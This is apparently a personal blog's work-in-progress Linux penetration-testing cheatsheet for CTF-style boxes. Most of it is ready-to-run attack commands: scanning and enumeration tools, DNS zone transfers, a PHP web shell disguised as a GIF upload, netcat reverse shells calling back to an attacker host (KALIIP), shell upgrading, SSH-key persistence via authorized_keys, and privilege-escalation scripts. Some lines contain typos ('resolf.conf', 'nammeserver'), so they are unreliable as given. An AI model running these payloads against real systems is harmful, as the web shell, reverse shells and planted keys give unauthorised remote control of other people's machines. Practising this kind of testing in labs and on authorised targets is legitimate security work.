WIP – Linux pentest cheatsheet

The Geek Ghost

Intended for personal use, i use many websites and pages from my blog, i just want to have all those things into one cozy page.

Enumeration

Port

­nmap

Simple quick and dirt with os and version detection :

nmap -A -O -v -T4 X.X.X.X

A more complete one :

nmap -sV -sC -oA tcpnmap X.X.X.X

Custom one to see if there is some special ports :

nmap -A -O -v -T4 --top-ports 5000 -oA tcptop5000nmap X.X.X.X

UDP :

nmap -sU -oA udpnmap X.X.X.X

P.S. -p- to scan all ports (take a break and go make a sandwich)

Webservice

Nikto

nikto -h X.X.X.X

Uniscan

uniscan -u http://X.X.X.X/ -qweds

Dirbuster

Start de gui :

dirbuster

most used list :

/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Dirb

dirb http://X.X.X.X /usr/share/dirb/wordlists/common.txt

(also big.txt is interesting)

Dirsearch

git clone http://github.com/maurosoria/dirsearch
python3 dirsearch.py -u http://X.X.X.X -e php -w /usr/share/wordlists/dirbuster/directory-lit-2.3-medium.txt -f -t 20

-f force extention
-r (recursive if needed)

Wpscan

wpscan --url http://X.X.X.X/wordpress --enumerate u vp vt

droopescan

Up to date drupal scanner

droopescan scan drupal -u X.X.X.X

Burp

Enum4linux

For extensive enum. enum4linux :

enum4linux -a -o -n -v X.X.X.X

DNS

NSLOOKUP

nslookup
>SERVER X.X.X.X
>127.0.0.1
Server: ...
Address: ...
>X.X.X.X
Server: ...
Address: ...
>box.com
Server: ...
Address: ...

Name: box.com
Address:X.X.X.X

dnsrecon

Reverse lookup brute force:

dnsrecon -r 127.0.0.0/24 -n X.X.X.X
dnsrecon -r 127.0.1.0/24 -n X.X.X.X
dnsrecon -r X.X.X.0/24 -n X.X.X.X

dns zone transfer

Reverse lookup brute force:

dig axfr @X.X.X.X

We can get few extra subdomains/domainfiles :

dig axfr box.com@X.X.X.X

add a dns server

edit :

/etc/resolf.conf
nammeserver X.X.X.X

Reverse Shell

To test

gif to upload to test

GIF8 <?php echo system($_REQUEST['command']); ?>
xxxx.gif?command=id

If it works

xxxx.gif?command=nc -e /bin/sh KALIIP 8081

netcat

TCP

On kali box : nc -lvnp 8081

nc -e /bin/sh KALIIP 8081

UDP

**(need to check -e -u)***
On kali box : nc -u -lvnp 8081

nc -e -u /bin/sh KALIIP 8081

To have full shell :

python -c 'import pty;pty.spawn("/bin/bash");'

Background with CTRL+Z

stty raw -echo
fg [enter]

(sometime you need to enter the command bash)

Create ssh keyset

ssh-keygen
PATH : /root/ssh_key

and the key generated need to be put inside the server

/home/user/.ssh/authorized_keys

to connect :

ssh -i ssh_key user@X.X.X.X

Usefull links:

Reverse Shell Cheat Sheet

Privilege Escalation

LinEnum.sh

linuxprivchecher.py

unixprivesc.sh

sudo info

to see if user can run command as sudo :

sudo -l

to see the version of sudo

dpkg -l sudo

Grab exploit directly from searchsploit :

searchsploit -x (put the path)

Leave a Reply

Your email address will not be published. Required fields are marked *